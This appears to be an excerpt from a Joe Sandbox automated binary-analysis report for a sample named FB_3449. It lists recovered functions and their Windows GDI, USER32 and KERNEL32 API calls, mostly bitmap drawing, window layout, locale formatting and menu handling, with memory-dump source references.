Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,090806FA,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,090806FA,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041FE50, Relevance: 21.1, APIs: 14, Instructions: 131

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041FE67
CreateCompatibleDC.GDI32(00000000), ref: 0041FE71
GetObjectA.GDI32(?,00000018,?), ref: 0041FE91
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,00000000,0041FF9E,?,00000000), ref: 0041FEA8
GetDC.USER32(00000000), ref: 0041FEB4
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041FEE1
ReleaseDC.USER32(00000000,00000000), ref: 0041FF07

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

SelectObject.GDI32(?,?), ref: 0041FF22
SelectObject.GDI32(?,00000000), ref: 0041FF31
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041FF5D
SelectObject.GDI32(?,00000000), ref: 0041FF6B
SelectObject.GDI32(?,00000000), ref: 0041FF79
DeleteDC.GDI32(?), ref: 0041FF8F
DeleteDC.GDI32(?), ref: 0041FF98

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043E4E4, Relevance: 19.7, APIs: 13, Instructions: 213

APIs

GetWindowDC.USER32(00000000), ref: 0043E518
GetClientRect.USER32(00000000,?), ref: 0043E53B
GetWindowRect.USER32(00000000,?), ref: 0043E54D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0043E563
OffsetRect.USER32(?,?,?), ref: 0043E578
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043E591
InflateRect.USER32(?,?,?), ref: 0043E5AF
GetWindowLongA.USER32(00000000,000000F0), ref: 0043E605
DrawEdge.USER32(?,?,00000000,00000008), ref: 0043E6D1
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043E6EA
OffsetRect.USER32(?,?,?), ref: 0043E709

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

FillRect.USER32(?,?,00000000), ref: 0043E725
ReleaseDC.USER32(00000000,?), ref: 0043E744

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00426938, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426971
GetSystemMetrics.USER32(00000000), ref: 00426996
GetSystemMetrics.USER32(00000001), ref: 004269A1
GetClipBox.GDI32(?,?), ref: 004269B3
GetDCOrgEx.GDI32(?,?), ref: 004269C0
OffsetRect.USER32(?,?,?), ref: 004269D9
IntersectRect.USER32(?,?,?), ref: 004269EA
IntersectRect.USER32(?,?,?), ref: 00426A00
IntersectRect.USER32(?,?,?), ref: 00426A20

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

EnumDisplayMonitors, xrefs: 00426950

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00423E8E, Relevance: 16.7, APIs: 11, Instructions: 165

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,090806FA,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,090806FA,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043B8BC, Relevance: 16.6, APIs: 11, Instructions: 133

APIs

Part of subcall function 0043B3DC: BeginPaint.USER32(00000000,?), ref: 0043B402
Part of subcall function 0043B3DC: SaveDC.GDI32(?), ref: 0043B436
Part of subcall function 0043B3DC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
Part of subcall function 0043B3DC: RestoreDC.GDI32(?,?), ref: 0043B4C2
Part of subcall function 0043B3DC: EndPaint.USER32(00000000,?), ref: 0043B4F6

GetDC.USER32(00000000), ref: 0043B907
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043B92B
ReleaseDC.USER32(00000000,00000000), ref: 0043B936
CreateCompatibleDC.GDI32(00000000), ref: 0043B93D
SelectObject.GDI32(00000000,?), ref: 0043B94D
BeginPaint.USER32(00000000,?), ref: 0043B96F

Part of subcall function 0043B8BC: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043B9CB
Part of subcall function 0043B8BC: EndPaint.USER32(00000000,?), ref: 0043B9DC
Part of subcall function 0043B8BC: SelectObject.GDI32(00000000,?), ref: 0043B9F6
Part of subcall function 0043B8BC: DeleteDC.GDI32(00000000), ref: 0043B9FF
Part of subcall function 0043B8BC: DeleteObject.GDI32(?), ref: 0043BA08

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00407134, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0040714C
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407158
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407167
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407173
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004071AF

Strings

Magellan MSWHEEL, xrefs: 00407142
MSWHEEL_ROLLMSG, xrefs: 00407153
MSH_WHEELSUPPORT_MSG, xrefs: 00407162
MSH_SCROLL_LINES_MSG, xrefs: 0040716E
MouseZ, xrefs: 00407147

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043B538, Relevance: 15.2, APIs: 10, Instructions: 177

APIs

RectVisible.GDI32(?,?), ref: 0043B5F1
SaveDC.GDI32(?), ref: 0043B607

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
RestoreDC.GDI32(?,?), ref: 0043B645

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
FrameRect.USER32(?,?,?), ref: 0043B6F9
DeleteObject.GDI32(?), ref: 0043B703
CreateSolidBrush.GDI32(00000000), ref: 0043B713
FrameRect.USER32(?,00000000,?), ref: 0043B746
DeleteObject.GDI32(?), ref: 0043B750

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00402A68, Relevance: 15.1, APIs: 10, Instructions: 129

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402AF0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B14
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B30
ReadFile.KERNEL32(?,?,00000080,?,00000000), ref: 00402B51
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402B7A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402B88
GetStdHandle.KERNEL32(000000F5), ref: 00402BC3
GetFileType.KERNEL32 ref: 00402BD9
CloseHandle.KERNEL32 ref: 00402BF4
GetLastError.KERNEL32(000000F5), ref: 00402C0C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00452694, Relevance: 15.1, APIs: 10, Instructions: 74

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004526DF
DeleteMenu.USER32(00000000,0000F130,00000000), ref: 004526FD
DeleteMenu.USER32(00000000,00000007,00000400), ref: 0045270A
DeleteMenu.USER32(00000000,00000005,00000400), ref: 00452717
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00452724
DeleteMenu.USER32(00000000,0000F020,00000000), ref: 00452731
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0045273E
DeleteMenu.USER32(00000000,0000F120,00000000), ref: 0045274B
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00452769
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00452785

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043491C, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139

APIs

Part of subcall function 00434D54: WindowFromPoint.USER32(=LC,?), ref: 00434D5A
Part of subcall function 00434D54: GetParent.USER32(00000000), ref: 00434D71

GetWindow.USER32(00000000,00000004), ref: 0043493E
GetCurrentThreadId.KERNEL32(004348B0,?,00000000,00000004,?,-0000000C,?), ref: 00434A12
EnumThreadWindows.USER32(00000000,004348B0,?), ref: 00434A18
GetWindowRect.USER32(00000000,?), ref: 00434A2F
IntersectRect.USER32(?,?,?), ref: 00434A9D

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

Strings

41C, xrefs: 004349D2
=LC, xrefs: 004349FA, 00434A3B, 00434A34, 00434A43
=LC, xrefs: 0043492B, 004349A3, 004349CC, 004349E1, 004349B0

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00409E60, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50

APIs

Part of subcall function 00409CD8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
Part of subcall function 00409CD8: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
Part of subcall function 00409CD8: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 00409EA0
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?), ref: 00409EA6
GetStdHandle.KERNEL32(000000F5,00409F10,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 00409EBB
WriteFile.KERNEL32(00000000,000000F5,00409F10,00000002,?), ref: 00409EC1
LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 00409EE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00409EF9

Strings

\s@, xrefs: 00409ECF
H@F, xrefs: 00409E74

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00436BAC, Relevance: 13.6, APIs: 9, Instructions: 150

APIs

MulDiv.KERNEL32(?,?,?), ref: 00436BE5
MulDiv.KERNEL32(?,?,?), ref: 00436BFF
MulDiv.KERNEL32(?,?,?), ref: 00436C2D
MulDiv.KERNEL32(?,?,?), ref: 00436C43
MulDiv.KERNEL32(?,?,?), ref: 00436C7B
MulDiv.KERNEL32(?,?,?), ref: 00436C93
MulDiv.KERNEL32(?,?,0000001F), ref: 00436CDD
MulDiv.KERNEL32(?,?,0000001F), ref: 00436D06

Part of subcall function 0041ED20: MulDiv.KERNEL32(00000000,00000048,?,?), ref: 0041ED31

MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436D2C

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00437A40, Relevance: 13.6, APIs: 9, Instructions: 122

APIs

GetDesktopWindow.USER32 ref: 00437A77
GetDCEx.USER32(?,00000000,00000402), ref: 00437A8A

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

SelectObject.GDI32(?,00000000), ref: 00437AAD
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AD3
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,00000000,00000000,00437B5B), ref: 00437AF5
PatBlt.GDI32(?,?,?,?,00000000,005A0049,?,?,?,00000000,?,005A0049,?,?,?,?), ref: 00437B14
PatBlt.GDI32(?,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?,?,00000000), ref: 00437B2E
SelectObject.GDI32(?,?), ref: 00437B3B
ReleaseDC.USER32(?,?), ref: 00437B55

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0040ACCC, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201

APIs

Part of subcall function 0040AB58: GetThreadLocale.KERNEL32 ref: 0040AB82
Part of subcall function 0040AB58: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000004A), ref: 0040AC77
Part of subcall function 0040AB58: GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040981C: GetThreadLocale.KERNEL32(00000000,0040992F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409838

GetThreadLocale.KERNEL32(00000000,0040AF97,?,?,00000000,00000000), ref: 0040AD02

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Part of subcall function 004097B8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Part of subcall function 00409AA4: GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 004099F4: GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
Part of subcall function 004099F4: GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
Part of subcall function 004099F4: EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Strings

m/d/yy, xrefs: 0040ADD1
AMPM, xrefs: 0040AF16
mmmm d, yyyy, xrefs: 0040ADFE
:mm, xrefs: 0040AF35
:mm:ss, xrefs: 0040AF52
AMPM , xrefs: 0040AF25

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00456E3C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132

APIs

GetActiveWindow.USER32 ref: 00456E4F
GetWindowRect.USER32(?,?), ref: 00456EA9
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456EE1

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

MessageBoxA.USER32(?,?,?,?), ref: 00456F22
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 00456F72

Part of subcall function 0044DE40: IsWindow.USER32(?), ref: 0044DE4E
Part of subcall function 0044DE40: EnableWindow.USER32(?,000000FF), ref: 0044DE5D

SetActiveWindow.USER32(?), ref: 00456F83

Strings

(, xrefs: 00456E86

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
